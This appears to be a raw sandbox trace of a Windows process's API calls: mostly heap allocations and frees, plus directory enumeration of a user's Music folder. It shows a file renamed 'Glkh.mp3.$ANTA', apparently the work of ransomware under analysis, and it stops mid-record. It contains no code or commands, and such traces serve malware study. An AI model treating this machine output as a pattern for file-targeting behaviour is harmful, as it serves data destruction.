RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x84) returned 0x1b7d028 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x110) returned 0x43cc1c8 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b7d028 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.483] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.483] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.483] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.484] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.484] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq")) returned 0x10 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.484] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.485] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.486] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0117.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.487] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd896870, ftCreationTime.dwHighDateTime=0x1d5e460, ftLastAccessTime.dwLowDateTime=0x12283ba3, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x12283ba3, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caa18, cFileName=".", cAlternateFileName="")) returned 0x41ac540 [0117.487] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd896870, ftCreationTime.dwHighDateTime=0x1d5e460, ftLastAccessTime.dwLowDateTime=0x12283ba3, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x12283ba3, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caa18, cFileName="..", cAlternateFileName="")) returned 1 [0117.487] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x121528d8, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x121528d8, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1219ef71, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x65d0, dwReserved0=0x0, dwReserved1=0x43caa18, cFileName="Glkh.mp3.$ANTA", cAlternateFileName="GLKHMP~1.$AN")) returned 1 [0117.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0117.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.487] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0117.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.488] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0117.488] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.488] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.488] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.489] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.489] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.489] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x121eb3cb, ftCreationTime.dwHighDateTime=0x1d69b3f, 